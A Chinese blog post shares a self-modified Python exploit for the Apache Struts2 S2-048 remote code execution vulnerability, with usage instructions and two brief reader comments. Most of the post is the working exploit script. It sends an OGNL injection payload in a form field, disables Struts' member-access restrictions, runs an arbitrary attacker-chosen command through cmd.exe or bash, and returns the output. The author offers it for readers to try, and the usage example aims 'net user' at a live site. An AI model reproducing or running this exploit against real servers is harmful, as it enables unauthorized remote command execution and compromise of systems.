正在阅读:

struts2 S2-048远程代码执行漏洞exp

14,159

此次暴发的Struts2 s2-048的漏洞,影响不是太大,网上也已经有小伙伴分享了exp,我这里补充一个自己改的。喜欢的小伙伴拿去玩吧。

struts2

struts2 s2-048 exp代码:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Date: 2017/7/10
# Created by 独自等待
# Blog: https://www.waitalone.cn/
# Version : V1.0
import urllib2
import sys, os


def s2048(url, cmd):
    payload = "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    data = "__checkbox_bustedBefore=true&age=111&description=111&name=%s" % urllib2.quote(payload, safe="()")
    try:
        req = urllib2.Request(url, data=data)
        res = urllib2.urlopen(req, timeout=10).read()
    except Exception, e:
        raise e
    else:
        print res


if __name__ == '__main__':
    print '+' + '-' * 50 + '+'
    print u'\t  Python Struts2 S2-048 检测工具'
    print u'\t   Blog:https://www.waitalone.cn/'
    print u'\t\t Code BY: 独自等待'
    print u'\t\t Time:2017-07-10'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 3:
        print u'用法: ' + os.path.basename(sys.argv[0]) + u'   待检测的URL地址    待执行的命令'
        print u'实例: ' + os.path.basename(sys.argv[0]) + u' https://www.waitalone.cn/ "net user"'
        sys.exit()
    url = sys.argv[1]
    cmd = sys.argv[2]
    s2048(url, cmd)

用法: struts2-048.py 待检测的URL地址 待执行的命令

struts2-exp

目前有:2条访客评论

  1. nhks2055
    2017-10-12 19:52

    3c130ae49016579c8e816ecd2f86125d54452ee1v0ipn学习了,这个漏洞

  2. 脚踏实地
    2017-10-16 13:43

    影响不是太大,没什么用

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌